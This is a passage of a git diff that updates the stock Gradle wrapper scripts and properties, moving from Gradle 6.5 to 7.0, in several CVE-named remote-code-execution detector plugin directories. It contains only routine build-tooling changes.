b/google/detectors/rce/cve201811776/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/cve201811776/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/cve201811776/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/cve201811776/gradlew b/google/detectors/rce/cve201811776/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/cve201811776/gradlew +++ b/google/detectors/rce/cve201811776/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/cve201811776/gradlew.bat b/google/detectors/rce/cve201811776/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/cve201811776/gradlew.bat +++ b/google/detectors/rce/cve201811776/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/cve20187600/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/cve20187600/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/cve20187600/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/cve20187600/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/cve20187600/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/cve20187600/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/cve20187600/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/cve20187600/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/cve20187600/gradlew b/google/detectors/rce/cve20187600/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/cve20187600/gradlew +++ b/google/detectors/rce/cve20187600/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/cve20187600/gradlew.bat b/google/detectors/rce/cve20187600/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/cve20187600/gradlew.bat +++ b/google/detectors/rce/cve20187600/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/cve20196340/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/cve20196340/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/cve20196340/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/cve20196340/gradle/wrapper/gradle-wrapper.jar 